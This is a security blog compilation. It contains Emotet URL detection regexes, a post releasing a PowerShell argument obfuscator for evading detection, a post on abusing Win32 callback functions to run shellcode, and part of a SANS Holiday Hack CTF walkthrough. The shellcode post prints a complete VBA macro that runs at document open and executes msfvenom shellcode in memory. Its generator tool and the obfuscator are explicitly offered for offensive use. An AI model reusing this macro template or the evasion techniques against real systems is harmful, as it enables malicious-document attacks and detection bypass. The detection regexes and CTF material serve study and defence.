^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$ karttoon 31MAY2017 - Emotet download - [ t5wx-x064-mzdb ] ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ karttoon 31MAY2017 - Emotet download - [ INVOICE-864339-98261 ] ^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$ karttoon 31MAY2017 - Emotet download - [ dhl/paket/com/pkp/appmanager/8376315127 ] ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ karttoon 31MAY2017 - Emotet download - [ RRT-13279129.dokument ] ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ karttoon 31MAY2017 - Emotet download - [ EDHFR-08-77623-document-May-04-2017 ] ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ karttoon 31MAY2017 - Emotet download - [ download2467 ] ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$ karttoon 31MAY2017 - Emotet download - [ LUqc663BAyN333-HoO ] ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$ karttoon 31MAY2017 - Emotet download - [ NUDA-X-52454-DE ] ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$ karttoon 31MAY2017 - Emotet download - [ CUST.-Document-YDI-04-GQ389557 ] ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ karttoon 31MAY2017 - Emotet download - [ zp3x-r88-wuh.view ] ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ karttoon 31MAY2017 - Emotet download - [ dhl___status___2668292851 ] ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$ karttoon 31MAY2017 - Emotet download - [ ORDER.-5883789520 ] ^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$ karttoon 31MAY2017 - Emotet download [ SCANNED/RZ7498WEXEZB ]

Hopefully this was helpful to some and demonstrated the ease in which these can be created to identify malicious patterns.

The more the merrier in the sharing community!


One thing I've noticed lately while analyzing PowerShell attacks is that no one is doing much in the way of argument obfuscation. The attacks focus primarily on their end payload, or the delivery mechanism, and use PowerShell simply as their vessel to launch their evil code. At most I see some tools randomizing case or, over the course of iterations, the developers have shortened arguments but nothing really useful.

To illustrate, I'm going to pick on Magic Unicorn (because it rocks) and show how the arguments used to launch PowerShell have changed.

3eda35e: full_attack = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + base64 922c34f: full_attack = "powershell -nop -wind hidden -noni -enc " + base64 a18cb5d: full_attack = "powershell -nop -win hidden -noni -enc " + base64

Not a whole lot of change over a two year period: no change of case, static argument positioning, and just a shortening of the used arguments.

If you check out another popular tool, PowerSploit, you can see how they approach building the arguments to launch their PowerShell payloads.

# Build the command line options # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea. $CommandlineOptions = New-Object String[](0) if ($PSBoundParameters['NoExit']) { $CommandlineOptions += '-NoE' } if ($PSBoundParameters['NoProfile']) { $CommandlineOptions += '-NoP' } if ($PSBoundParameters['NonInteractive']) { $CommandlineOptions += '-NonI' } if ($PSBoundParameters['WindowStyle']) { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }

Again, no argument position randomization since they join the arguments as they are built; however, you have the potential to include or exclude various arguments based on your need, which of course will make it less static. It's slightly better than Magic Unicorn in that respect.

Soooo...what? Who cares and why is this relevant?

It's relevant because when you know an attackers tool-of-choice, at best you may be able to create point-defenses to stop them but, at worst, you at least get an insight into the attackers tool set and capabilities. With either end of the spectrum, it's good information to have when thinking about what step to take next during analysis or response.

Now, most PowerShell attacks that I see are delivered through malicious Microsoft Office documents containing macros that launch PowerShell OR through generated binaries that are simply designed to execute the commands. I've seen a lot of effort go into obfuscating macros and a lot of work go into the actual PowerShell payloads but I assume most people look at the arguments and don't think much about this middle link. It's so inconsequential to the overall attack but it does provide a perfect place for analysts and defenders to profile or identify the code.

Ok, but how unique are these argument strings?

To use the two tools from above, if I Google each of their respective strings...

First (oldest) Magic Unicorn: 58 hits "-noprofile -windowstyle hidden -noninteractive -EncodedCommand" Second Magic Unicorn: 150 hits "-nop -wind hidden -noni -enc" Third (newest) Magic Unicorn: 447 hits "-nop -win hidden -noni -enc" PowerSploit: 41 hits "-NoP -NonI -W Hidden -E"

It's relatively trivial to go from one of those lines, which get generated as process activity in every sandbox under the sun, to a small set of hits on Google. When used with additional contextual information (e.g. payload or delivery mechanism) you can try to narrow in faster on the tool. It's not rocket science and, for it to actually be useful, it requires at least enough arguments to stand out from someone just running, for example, "-encodedcommand".

In my experience, I've found these argument patterns to be very helpful and use them quite frequently during analysis. This, of course, now brings me to the point of the blog - a new tool I put together called argfuscator which attempts to address the issues I mentioned previously.

Specifically, it will randomly adjust lengths of each argument, randomize case in arguments, randomize case in values (sans base64 in "encodedcommand"), randomize caret injection for further command-line obfuscation (sans values provided to "command"), and finally randomize the argument positions. There is enough variety that it creates fairly unique strings each time.

Using the same four strings as before, but now running them through the tool.

$ python argfuscator.py "powershell.exe -noprofile -windowstyle hidden -noninteractive -EncodedCommand ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=" pOwErsheLL.EXe -e^nco^d^e^dc ZQ^BjAGg^A^bw^AgA^C^IA^V^w^B^pA^H^oAYQ^B^yAG^Q^AI^g^A^= -Wi^N^do hI^dDE^N -n^OnIN^t -n^O^P^R $ python argfuscator.py "powershell.exe -nop -wind hidden -noni -enc ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=" pOwERSHElL.Exe -encodedcommand ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA= -WI^N^doWS H^I^d^DEn -n^op^rO^f -nONInTeRAcTiVe $ python argfuscator.py "powershell.exe -nop -win hidden -noni -enc ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=" powerShELl.exe -Wi hiDDEn -n^oPRoF -ec ZQ^B^jA^G^g^A^bwAg^ACIA^VwBp^AH^o^AYQ^B^y^AGQ^AI^g^A= -NONInTeRaCTiVe $ python argfuscator.py "powershell.exe -NoP -NonI -W Hidden -E ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA=" p^O^wE^R^s^hELl.^EXe -e ZQB^jA^GgAbwAg^A^C^I^A^VwB^pA^H^o^AYQ^By^AG^QAI^gA^= -w^iN^d^o^Ws^t h^i^dD^eN -NoninteRActIv -NOprofilE

I've tested the script using various custom PowerShell commands, along with regenerating ones I've seen in the wild, and it all seemed to work or I ironed out the bugs. I'm sure it's not perfect and there are certain areas that could use improving but I think it's a decent start that can provide value for the offensive teams out there.

Sometimes it's the little things...

The code is available on GitHub.

I've been doing a lot of analysis on malicious docs (maldocs) lately and, among a popular variant circulating right now, is a technique that I found particularly interesting. Effectively, it abuses native Windows function calls to transfer execution to shellcode that it loads into memory. I thought it was cool in this context, and not something that I was super familiar with, even though I've since learned it's a very old technique, so I set out to do some research in identifying additional functions that could be abused in a similar way and how to leverage them.

To give you an idea of how this works, I'll go over a quick example of how shellcode can be executed through a function. For this, I'll use EnumResourceTypesA.

EnumResourceTypesA( __in_opt HMODULE hModule, __in ENUMRESTYPEPROCA lpEnumFunc, __in LONG_PTR lParam );

As stated by Microsoft, this function "enumerates resource types within a binary module" and the second argument, the interesting bit, is "a pointer to the callback function to be called for each enumerated resource type". If I supply the memory address of the shellcode to lpEnumFunc, it will pass each enumerated resource to that function but, since it's the shellcode, it just executes whatever is at the memory address I provided - keep in mind the memory page still needs to allow for code execution.

In the context of maldocs, VBA gives you the capabilities to directly call Windows functions yet, outside of VBA, these functions can also be leveraged during typical exploitation attacks if you know the target application already has the function imported. You could possibly save ROP chain space that might typically be used for certain gadgets that carry out like functionality as well, depending on the function and required arguements. In addition, from a general offsec perspective, if you continue using the same function calls for your maldocs, you leave a very clear pattern of dynamic and static artifacts that make it trivial to track and detect, so it's nice to have the option of mixing things up a bit. As the saying goes, variety is the spice of life!

To enumerate all of the possible functions, I looked at the C header files that come in the Windows 7 x86 SDK.

$ cat *.h |tr '\r\n' ' ' |tr ';' '\n' |sed -e 's/--//g' -e 's/ / /g' |grep -iE "__in.+(Func|Proc|CallBack| lpfn| lpproc)," |grep -oE " [a-zA-Z]+\([a-zA-Z0-9*_, ]+\)" |grep "__in" |cut -d"(" -f1 |sort -u |sed -e 's/^ //g'

The meat of it is the grep for '(Func|Proc|CallBack| lpfn| lpproc)', the rest is mainly attempting to normalize the header file function structures for easier parsing since they were all over the place in terms of style.

After getting a list of candidate functions, I set out testing each one to try and figure out which would be the most likely to be used in maldocs. This equated to me reading the MSDN article to understand the purpose of the function and then a few quick lines of VBA to see if I could get it working. While most of these can most likely be massaged into executing code at your specified address, there isn't a lot of reward in chaining together multiple functions to do so with the abundance of "easy" ones. For example, the DestroyCluster function has a similar callback argument, but you'd have to also call CreateCluster and OpenCluster to setup the environment first, which is a bit much for the usecase.

The below table lists the identified functions which appeared to have the ability to accept a memory address for code execution and may be open to possible abuse.

AddClusterNode BluetoothRegisterForAuthentication CMTranslateRGBsExt
CallWindowProcA CallWindowProcW CreateCluster
CreateDialogIndirectParamA CreateDialogIndirectParamW CreateDialogParamA
CreateDialogParamW CreatePrintAsyncNotifyChannel CreateTimerQueueTimer
DavRegisterAuthCallback DbgHelpCreateUserDump DbgHelpCreateUserDumpW
DdeInitializeA DdeInitializeW DestroyCluster
DialogBoxIndirectParamA DialogBoxIndirectParamW DialogBoxParamA
DialogBoxParamW DirectSoundCaptureEnumerateA DirectSoundCaptureEnumerateW
DirectSoundEnumerateA DirectSoundEnumerateW DrawStateA
DrawStateW EnumCalendarInfoA EnumCalendarInfoW
EnumChildWindows EnumDateFormatsA EnumDateFormatsW
EnumDesktopWindows EnumDesktopsA EnumDesktopsW
EnumEnhMetaFile EnumFontFamiliesA EnumFontFamiliesExA
EnumFontFamiliesExW EnumFontFamiliesW EnumFontsA
EnumFontsW EnumICMProfilesA EnumICMProfilesW
EnumLanguageGroupLocalesA EnumLanguageGroupLocalesW EnumMetaFile
EnumObjects EnumPropsExA EnumPropsExW
EnumPwrSchemes EnumResourceLanguagesA EnumResourceLanguagesExA
EnumResourceLanguagesExW EnumResourceLanguagesW EnumResourceNamesA
EnumResourceNamesExA EnumResourceNamesExW EnumResourceNamesW
EnumResourceTypesA EnumResourceTypesW EnumResourceTypesExA
EnumResourceTypesExW EnumResourceTypesW EnumSystemCodePagesA
EnumSystemCodePagesW EnumSystemLanguageGroupsA EnumSystemLanguageGroupsW
EnumSystemLocalesA EnumSystemLocalesW EnumThreadWindows
EnumTimeFormatsA EnumTimeFormatsW EnumUILanguagesA
EnumUILanguagesW EnumWindowStationsA EnumWindowStationsW
EnumWindows EnumerateLoadedModules EnumerateLoadedModulesEx
EnumerateLoadedModulesExW EventRegister GetApplicationRecoveryCallback
GrayStringA GrayStringW KsCreateFilterFactory
KsMoveIrpsOnCancelableQueue KsStreamPointerClone KsStreamPointerScheduleTimeout
LineDDA MFBeginRegisterWorkQueueWithMMCSS MFBeginUnregisterWorkQueueWithMMCSS
MFPCreateMediaPlayer MQReceiveMessage MQReceiveMessageByLookupId
NotifyIpInterfaceChange NotifyStableUnicastIpAddressTable NotifyTeredoPortChange
NotifyUnicastIpAddressChange PerfStartProvider PlaExtractCabinet
ReadEncryptedFileRaw RegisterApplicationRecoveryCallback RegisterForPrintAsyncNotifications
RegisterServiceCtrlHandlerExA RegisterServiceCtrlHandlerExW RegisterWaitForSingleObject
RegisterWaitForSingleObjectEx SHCreateThread SHCreateThreadWithHandle
SendMessageCallbackA SendMessageCallbackW SetTimerQueueTimer
SetWinEventHook SetWindowsHookExA SetWindowsHookExW
SetupDiRegisterDeviceInfo SymEnumLines SymEnumLinesW
SymEnumProcesses SymEnumSourceLines SymEnumSourceLinesW
SymEnumSymbols SymEnumSymbolsForAddr SymEnumSymbolsForAddrW
SymEnumSymbolsW SymEnumTypes SymEnumTypesByName
SymEnumTypesByNameW SymEnumTypesW SymEnumerateModules
SymEnumerateModules64 SymEnumerateSymbols SymEnumerateSymbols64
SymEnumerateSymbolsW SymSearch SymSearchW
TranslateBitmapBits WPUQueryBlockingCallback WdsCliTransferFile
WdsCliTransferImage WinBioCaptureSampleWithCallback WinBioEnrollCaptureWithCallback
WinBioIdentifyWithCallback WinBioLocateSensorWithCallback WinBioRegisterEventMonitor
WinBioVerifyWithCallback WlanRegisterNotification WriteEncryptedFileRaw
WsPullBytes WsPushBytes WsReadEnvelopeStart
WsRegisterOperationForCancel WsWriteEnvelopeStart mciSetYieldProc
midiInOpen midiOutOpen mixerOpen
mmioInstallIOProcA mmioInstallIOProcW waveInOpen

Out of that list, I was able to get the 49 functions, highlighted in red, to execute basic Calc shellcode with little to no additional interaction. At most, I had to provide some unique data, such as a handle to a process or specific values, but for the most part they are standalone and accept a 0 or 1 as values to every other argument the function needs.

I wrapped all of this into a small little script I'm calling trigen (think 3 combo-generator) which randomly puts together a VBA macro using API calls from pools of functions for allocating memory (4 total), copying shellcode to memory (2 total), and then finally abusing the Win32 function call to get code execution (48 total - I left SetWinEventHook out due to aforementioned need to chain functions). In total, there are 384 different possible macro combinations that it can spit out.

The tool can be downloaded from here and will generate output similar to the below. It takes one argument, which is the hex-string of the shellcode, but it will do some minimal parsing of msfvenom output too (C or Py).

# python trigen.py "$(msfvenom --payload windows/exec CMD='calc.exe' -f c)" No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 193 bytes ################################################ # # # Copy VBA to Microsoft Office 97-2003 DOC # # # # Alloc: HeapAlloc # # Write: RtlMoveMemory # # ExeSC: EnumSystemCodePagesW # # # ################################################ Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long Private Sub Document_Open() Dim shellCode As String Dim shellLength As Byte Dim byteArray() As Byte Dim memoryAddress As Long Dim zL As Long zL = 0 Dim rL As Long shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500" shellLength = Len(shellCode) / 2 ReDim byteArray(0 To shellLength) For i = 0 To shellLength - 1 If i = 0 Then pos = i + 1 Else pos = i * 2 + 1 End If Value = Mid(shellCode, pos, 2) byteArray(i) = Val("&H" & Value) Next rL = createMemory(&H40000, zL, zL) memoryAddress = allocateMemory(rL, zL, &H5000) copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1 executeResult = shellExecute(memoryAddress, zL) End Sub

The logic of the code is fairly straight forward. Allocate memory, copy shellcode into memory, transfer execution to the shellcode via abused function call. The script will include the necessary code for each part.

I'm also including the VBA I worked from as I went through my testing, which has some notes and other tidbits. Feel free to experiment with that or pick up where I left off.


This years SANS Holiday Hack was excellent! They absolutely killed it making a fun CTF this year! This years challenge included a Christmas themed jRPG, a custom soundtrack, 21 achievements, and 10 questions that you need to answer to complete it.

I laughed, I yelled, I got to hang out and meet some cool like-minded people over a few nights, and I'm not ashamed to say I even bopped my head a bit to Christmas music.

The gist of the story is that Santa was kidnapped while delivering presents while two children heard from their rooms. Throughout the game, you'll help investigate clues and solve puzzles to further progress the story and save Santa while figuring out who the nefarious villian was that took him.

This is a long post and covers answering every question in this years challenge, beating each terminal, hacking each server, piecing together the final audio, and finding all of the coins to complete all of the achievements. I've tried to break it down as logically as possible and detail my methodology, failures, and notes throughout the journey. Enjoy!

Here are some festive reading tunes as well.

Question 01 - Santa's Tweets

1) What is the secret message in Santa's tweets?

There first thing we're provided with is Santa's business card, which includes his Twitter and Instragram handles.

Taking a look at his Twitter account, he has 350 tweets that all look encoded.

Initial thought was possibly XOR'd data with a key being some repeating pattern of Santa related text so I started copying it out, tweet by tweet, into a text file for better analysis. After maybe 15 or so tweets a definite pattern started to emerge, it just wasn't what I was expecting - a sideways "B" in ASCII art displayed. I went ahead and scrolled to the beginning of his Twitter timeline so that all 350 tweets were on my screen, then simply copy/pasta'd them out. Using a little grep-fu revealed the answer to Question 1.

$ grep -vE "Nov 14|Retweet|Like |More|@SantaWClaus|retweet" santawclaus_twitter

The answer is "BUG BOUNTY".

Question 02 - SantaGram ZIP

2) What is inside the ZIP file distributed by Santa's team?

Taking a look this time at Santa's Instragram, there are just three images. Only one is particularly interesting and I've put two red boxes over the details we need for this question.

It's pretty difficult to read but it's a file name and a FQDN that, when combined, allow us to download the ZIP file.

.\ -DestinationPath SantaGram_v4.2.zip www.northpolewonderland.com

The ZIP is password protected but using the "bugbounty" password from Question 1, it successfully extracts an APK file for the SantaGram application.

$ 7z x SantaGram_v4.2.zip 7-Zip [64] 9.38 beta Copyright (c) 1999-2014 Igor Pavlov 2015-01-03 p7zip Version 9.38.1 (locale=utf8,Utf16=on,HugeFiles=on,8 CPUs) Processing archive: SantaGram_v4.2.zip Extracting SantaGram_4.2.apk Enter password (will not be echoed) : Everything is Ok Size: 2257390 Compressed: 1963026

Question 03 - APK Embedded Credentials

3) What username and password are embedded in the APK file?

Opening the APK up in Bytecode Viewer and doing a search for the string "password" returns a number of hits. Quickly looking at each one, we find the embedded credentials in the "SantaGram_4.2/com/northpolewonderland/santagram/b.class" file, within the "a" function.

Below is the Java representation of the decompiled smali code, which makes it easier to read.

JSONObject localJSONObject = new JSONObject(); try { localJSONObject.put("username", "guest"); localJSONObject.put("password", "busyreindeer78"); localJSONObject.put("type", "usage"); localJSONObject.put("activity", paramString); localJSONObject.put("udid", Settings.Secure.getString(paramContext.getContentResolver(), "android_id")); new Thread(new b.1(paramContext, localJSONObject)).start(); return; }

The username is "guest" and the password is "busyreindeer78".

Question 04 - APK Embedded Credentials

4) What is the name of the audible component (audio file) in the SantaGram APK file?

This time, searching didn't come up with any quick hits so I began to look at the Decoded Resources within Bytecode Viewer. Under "SantaGram_4.2/res/raw/" we find the MP3 file "discombobulatedaudio1.mp3"

Question 05 - Password on the Cranbian System

5) What is the password for the "cranpi" account on the Cranberry Pi system?

This is the first question that requires you interact with the jRPG game and where things start picking up! The first Elf NPC you encounter (Holly Evergreen) will give you a quest to find all five pieces of the Cranberry Pi system: heat sink, Cranberry Pi board, SD card, power cord, and a HDMI cable. These can be found around the map and are laid out to get you familiar with all parts of the game world. Once you've put them together and talked to Holly again, she'll give you a link to download the Cranbian image. The Cranberry Pi will also allow you to access terminals used in later parts of the game.

# 7z x cranbian.img.zip 7-Zip 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU) Processing archive: cranbian.img.zip Extracting cranbian-jessie.img Everything is Ok Size: 1389363200 Compressed: 250363700

Since we know we need to get a password for an account, along with the obvious references to Raspberry Pi, we know we're going to likely be cracking some Linux hashes so let's get-to-mountin'! The Elf Wunorse Openslae offers up a few hints on how to do this.

<Wunorse Openslae> - Hi, I'm Wunorse Openslae. I work on engineering projects for Santa. <Wunorse Openslae> - A lot of people don't know this, but his sleigh can travel through space and time. I'm quite proud. <Wunorse Openslae> - The SCADA interface for sleigh functions is controlled with a Cranberry Pi and Cranbian Linux. <Wunorse Openslae> - It's really powerful to be able to switch out firmware builds by swapping SD cards. <Wunorse Openslae> - Dealing with piles of SD cards though, that's a different story. Fortunately, this article gave me some ideas on better data management. <Wunorse Openslae> - SantaGram? Yeah, it's popular up here. #elflife!

The first thing we do is check the image for sector size and starting offset of the Linux partition.

# fdisk -l cranbian-jessie.img Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes 255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x5a7089a1 Device Boot Start End Blocks Id System cranbian-jessie.img1 8192 137215 64512 c W95 FAT32 (LBA) cranbian-jessie.img2 137216 2713599 1288192 83 Linux

Since the sector size is 512 bytes, we can multiply it by the "Start" offset (137216) and arrive at the starting location of the partition, which is 70254592 bytes in. With this information, we can mount the filesystem.

# mount -v -o offset=70254592 -t ext4 cranbian-jessie.img /mnt/img/ mount: enabling autoclear loopdev flag mount: going to use the loop device /dev/loop0 /root/Desktop/cranbian-jessie.img on /mnt/img type ext4 (rw,offset=70254592)

Taking a look at "/etc/shadow" we can see the salted hash for the "cranpi" account we need to crack.


Before cracking it, I'll combine the "passwd" and "shadow" files to get a nice format for John.

$ ./unshadow cranpi_passwd cranpi_shadow root:*:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:*:2:2:bin:/bin:/usr/sbin/nologin sys:*:3:3:sys:/dev:/usr/sbin/nologin sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/usr/sbin/nologin man:*:6:12:man:/var/cache/man:/usr/sbin/nologin lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:*:8:8:mail:/var/mail:/usr/sbin/nologin news:*:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:*:13:13:proxy:/bin:/usr/sbin/nologin www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin backup:*:34:34:backup:/var/backups:/usr/sbin/nologin list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:*:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:*:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:*:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:*:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false messagebus:*:104:109::/var/run/dbus:/bin/false avahi:*:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false ntp:*:106:111::/home/ntp:/bin/false sshd:*:107:65534::/var/run/sshd:/usr/sbin/nologin statd:*:108:65534::/var/lib/nfs:/bin/false cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:1000:1000:,,,:/home/cranpi:/bin/bash

The Minty Candycane Elf hinted at using the "rockyou.txt" wordlist, which is standard on all Kali Linux distributions.

<Minty Candycane> - Howdy, my name is Minty Candycane. I'm on the red team, Rudolph's Red Team! <Minty Candycane> - I've been spending a lot of time with NMAP. It is such a great port scanner! I'm very thorough so I check all the TCP ports to look for extra services. <Minty Candycane> - NMAP is also great for finding extra files on web servers. The default scripts run with the "-sC" option work really well for me. <Minty Candycane> - What did the elf say was the first step in using a Christmas computer? <Minty Candycane> - "First, YULE LOGon"! <Minty Candycane> - I crack people up. <Minty Candycane> - Speaking of cracking, John the Ripper is fantastic for cracking hashes. It is good at determining the correct hashing algorithm. <Minty Candycane> - I have a lot of luck with the RockYou password list. <Minty Candycane> - Speaking of rocks, where do geologists like to relax? <Minty Candycane> - In a rocking chair. HA!

After 6 minutes, John successfully cracks the password.

$ ./john --wordlist=rockyou.txt unshadow_cranpi Loaded 1 password hash (sha512crypt [64/64]) guesses: 0 time: 0:00:00:11 0.08% (ETA: Tue Dec 13 15:39:08 2016) c/s: 1321 trying: chato - elodie guesses: 0 time: 0:00:00:47 0.33% (ETA: Tue Dec 13 15:47:20 2016) c/s: 1241 trying: kruimel - ilovetyson guesses: 0 time: 0:00:02:17 0.98% (ETA: Tue Dec 13 15:42:57 2016) c/s: 1228 trying: onlyyou1 - nippy1 yummycookies (cranpi) guesses: 1 time: 0:00:06:06 DONE (Tue Dec 13 11:56:04 2016) c/s: 1241 trying: yveth - yoyoyo34 Use the "--show" option to display all of the cracked passwords reliably

Look at those abysmally slow cracking speeds...it's embarrassing! The answer for question 5 is "yummycookies".

Question 06 - Terminal Hacking to Save Santa

6) How did you open each terminal door and where had the villain imprisoned Santa?

There are 5 terminals strewn throughout the game. Each one of them is a unique puzzle to be solved and I'll cover them in their own respective sections.

Terminal 1 - Elf House #2

Each terminal includes a banner when you logon that tells you what needs to be accomplished.

******************************************************************************* * * *To open the door, find both parts of the passphrase inside the /out.pcap file* * * *******************************************************************************

For the first terminal, we can see that the logged in username is "scratchy" and there is an "itchy" user as well - an obvious Simpsons reference (which later becomes important). We can also see that we don't have permission to look at the "/out.pcap" file as it's owned by the "itchy" account with 0400 permissions.

scratchy@37b03af8cfa2:~$ ls scratchy@37b03af8cfa2:~$ pwd /home/scratchy scratchy@37b03af8cfa2:~$ cd .. scratchy@37b03af8cfa2:/home$ ls itchy scratchy scratchy@37b03af8cfa2:/home$ strings /out.pcap strings: /out.pcap: Permission denied scratchy@37b03af8cfa2:/home$ ls -lah /out.pcap -r-------- 1 itchy itchy 1.1M Dec 2 15:05 /out.pcap scratchy@37b03af8cfa2:~$ uname -a Linux 37b03af8cfa2 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux

While trying to figure out how to access this file then, I checked my "sudo" access.

scratchy@37b03af8cfa2:~$ sudo -l sudo: unable to resolve host 37b03af8cfa2 Matching Defaults entries for scratchy on 37b03af8cfa2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User scratchy may run the following commands on 37b03af8cfa2: (itchy) NOPASSWD: /usr/sbin/tcpdump (itchy) NOPASSWD: /usr/bin/strings

Ok, that seems pretty straight forward. We can run "tcpdump" and "strings" as user "itchy" with no password; this should be all we need to beat the challenge.

*NOTE* For whatever reason this terminal disconnected me constantly...whether it's because it was being bombarded by people or what, I don't know but it was really unstable.

scratchy@85f98e630f6f:~$ sudo -u itchy /usr/bin/strings /out.pcap sudo: unable to resolve host 85f98e630f6f ZAX< ZAX} ZAX, BGET /firsthalf.html HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: Connection: Keep-Alive ZAX2 4hf@ Ehg@ OHTTP/1.0 200 OK ZAX ZAX# [hh@ OServer: SimpleHTTP/0.6 Python/2.7.12+ ZAXr rhi@ ODate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: text/html Ihj@ PContent-Length: 113 ZAX2 ZAXI dhk@ PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT P<html> <head></head> <body> <form> <input type="hidden" name="part1" value="santasli" /> </form> </body> </html> 4hm@ ZAXW @2/@ DGET /secondhalf.bin HTTP/1.1 User-Agent: Wget/1.17.1 (darwin15.2.0) Accept: */* Accept-Encoding: identity Host: Connection: Keep-Alive ZAX THTTP/1.0 200 OK TServer: SimpleHTTP/0.6 Python/2.7.12+ ZAX" ,#"=X TDate: Fri, 02 Dec 2016 11:28:00 GMT Content-type: application/octet-stream ZAXr ,#o=X ZAXr UContent-Length: 1048097 Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT 4-1@ UL}* cLgc %JK )$mg@ 8uTJ G]%s =3N\h x"9Bv/ ...

We have two "GET" method requests for files, "firsthalf.html" and "secondhalf.bin". In the first file, you can quickly see "part1" of the passphrase we need, "santasli". The second file is a BIN so we'll need to see if we can extract this from the PCAP.

The first approach I took was to copy all of the packet data out of the PCAP itself since I was limited in the tools I could use when accessing the "out.pcap" file.

